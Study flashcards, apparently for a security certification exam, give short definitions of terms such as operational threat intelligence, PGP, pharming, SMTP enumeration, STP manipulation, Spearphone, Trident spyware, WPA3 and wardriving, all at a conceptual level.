Deck E Prt. 2 Flashcards
Operational Threat Intelligence
Is the DATA that is collected from Sources such as Humans, Social Media, & Chat Rooms as well as from Events that resulted in Cyberattacks. In this Process, the Analyst prepares a report that includes identified malicious activities, Recommended courses of Action, and Warnings for emerging Attacks.
Operational Threat Intelligence
Is obtained by Analyzing human behavior, threat groups, and so on. This Information Helps in Predicting Future Attacks and Thus Enhancing Incident Response Plans and Mitigation Strategies as required. Operational Threat Intelligence is generally in the Form of a report that Contains Identified Malicious Activities, Recommended Courses of action and warnings of emerging attacks.
Operational Threat Intelligence
Is about Uncovering Specific Incoming Attacks before they happen. Most Operational Threat Intelligence Comes from Closed Sources, Although some threat actors discuss their plans via Social Media or Public Chat Rooms. Operational Threat Intelligence Provides Information about Specific Threats against the Organization.
PCI-DSS
Stands for Payment Card Industry-Data Security Standard. It is the Security Standard Applicable to a Credit Card Company
PGP
Is USED for Securing Email Messages. It is an Encryption Software, which is a FREE Implementation of the OpenPGP Standard that uses both Symmetric Key Cryptography & Asymmetric Key Cryptography for Improved Speed and Secure Key Exchange.
Pharming
USES Malicious Code to redirect users WEB Traffic. Once Redirected to these fake Websites, Users are prompted to enter personal Information, which is then used to commit Identify Theft or Financial Fraud.
Phishing Attack
Makes the Victim Open the Fraudulent email and click on the Malicious Attachment. This Results in the Malicious Attachment being downloaded and fileless malware being injected onto the software.
Preparation Phase
In The Incident Handling Process, the Preparation Phase is Responsible for Defining Rules, Collaborating with Human Workforce, Creating a back up Plan, and Testing the Plans for an Organizatoin.
Promiscuous Mode
Is The Type of Configuration that allows a wired or Wireless Network Interface Controller to pass all the traffic it Receives to the CPU (Central Processing Unit), rather than passing only the Frames that the controller is intended to receive.
Public Key Cryptography
Examples of Public Key Cryptography are: PGP (Pretty Good Privacy), SSL (Secure Socket Layer), IKE (Internet Key Exchange).
SMTP Enumeration
In SMTP Enumeration, The TWO Internal Commands VRFY and EXPN Provide a confirmation of Valid Users, Email Addresses, Aliases, and Mailing Lists.
STP Manipulation Attack
After Launching the STP Manipulation Attack the Attacker Creates a SPAN Entry on the Spoofed Root Bridge and Redirects the Traffic to his Computer.
Scareware Attack
Scareware Attack try to Scare you with Something that is a Hoax. When a Pop UP Appears to a user stating that this computer may have been infected with spyware. Click here to install an Anti Spyware Tool to Resolve this issue.
Spearphone Attack
EXPLOITS The Hardware of the Phone so the Attacker can Monitor the Loudspeaker Output from Data Sources such as Voice Assistants, Multimedia Messages, and Audio Files by using a Malicious App to breach Speech Privacy. The Spearphone Attack Breaches Speech Privacy by exploiting the motion Sensor accelerometer and capturing Speech Reverberations Generated through the Loudspeaker.
Split DNS
Is a DNS Configuration in which the Organization has one DNS (Domain Name Server) in a DMZ (Demilitarized Zone) & a Second DNS Server on the Internal Network. A Split DNS Infrastructure is a Solution to the problem of using the same domain name for Internally and Externally Accessible Resources.
Spoofed Session Flood Attack
Is Where the Attackers Create Fake or Spoofed TCP Sessions by Carrying Multiple SYN, ACK, & RST or FIN Packets. This Attack can bypass Firewalls.
Syhunt Hybrid
Syhunt Hybrid a Security Scanner to Automate Web Application Security Testing and to Guard the Organizations Web Infrastructure Against Web Application Threats. The Analyst can use that Tool to Detect XSS, Directory Transversal Problems, Fault Injection, SQL Injection, Attempts to Execute Commands and several other Attacks.
TCPTrace
Is a Tool that is Used to Analyze the Files Produced by several Packet Capture Programs such as TCPDump, WinDump, Wireshark, & EtherPeek. tcptrace is a free and open source tool for Analyzing TCP Dump Files.
Test Automation
In Security Testing can accelerate Benchmark Tests and repeat them with a consistent Test setup. But it cannot Replace Manual testing completely.
Trident
Is the Spyware that Can take Complete Control of the Target Mobile Device by Jailbreaking the Device Remotely and can record Audio, Capture Screenshots, and Monitor all Phone Calls and SMS messages.
WPA3 Personal
Is a Wireless Security Protocol that Replaces the Personal PSK (Pre Shared Key) Authentication with SAE (Simultaneous Authentication of Equals) and is therefore resistant to offline Dictionary Attacks.
Wardriving
Is the Wireless Attack in which the Hackers sit in the Parking lot and use Hacking Tools on their Laptop with the intention to find a Free Access Wireless Network.
Web Of Trust
Is a Security Model in which every User in the Network Maintains a Ring of Public Keys. In this Model a User NEEDS to Encrypt a Message using the Receivers Public Key, and only the Receiver can Decrypt the message using their Private Key
Worm
Is a Type of Malware that Spreads from one System to Another or from One Network to Another and Causes similar types of Damage as Viruses do to the Infected System
